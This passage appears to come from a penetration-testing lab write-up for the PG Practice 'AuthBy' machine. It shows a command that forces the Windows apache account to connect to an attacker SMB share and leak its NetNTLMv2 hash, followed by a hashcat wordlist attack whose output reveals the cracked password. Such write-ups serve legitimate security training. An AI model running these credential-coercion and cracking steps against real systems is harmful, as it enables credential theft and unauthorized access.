NTLM Leak
C:\wamp\bin\apache\Apache2.2.21> dir \\192.168.45.245\smb\Attempting to leak the NTLM of the current account, apache, via connecting to Kali’s SMB server
/Practice/AuthBy/4-Post_Enumeration/attachments/{1A7EE02E-8159-42AC-8E2F-A2B86656E6CF}.png)
NTLM Leaked
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ hashcat --show apache.hash
5600 | NetNTLMv2 | Network Protocol
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ hashcat -a 0 -m 5600 apache.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
APACHE::LIVDA:aaaaaaaaaaaaaaaa:f9d9b59f0bf887d7228fb1af2affaab9:0101000000000000804a78c3328adb01cd7638a0b89f97fb000000000100100078006d0049004e0065006c00510043000300100078006d0049004e0065006c005100430002001000720055007100630047006d0041007a0004001000720055007100630047006d0041007a0007000800804a78c3328adb01060004000200000008003000300000000000000000000000003000007497604070285cf61e58ccde421bdd5241215c2e95661552bf49d1fca765d9e8000000000000000000000000:1q2w3e4r5t6y7u
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: APACHE::LIVDA:aaaaaaaaaaaaaaaa:f9d9b59f0bf887d7228f...000000
Time.Started.....: Fri Feb 28 23:49:31 2025 (0 secs)
Time.Estimated...: Fri Feb 28 23:49:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3751.6 kH/s (1.70ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 98304/14344385 (0.69%)
Rejected.........: 0/98304 (0.00%)
Restore.Point....: 86016/14344385 (0.60%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: burats -> Donovan
Hardware.Mon.#1..: Util: 11%
Started: Fri Feb 28 23:49:31 2025
Stopped: Fri Feb 28 23:49:33 2025Password hash cracked for the apache account; 1q2w3e4r5t6y7u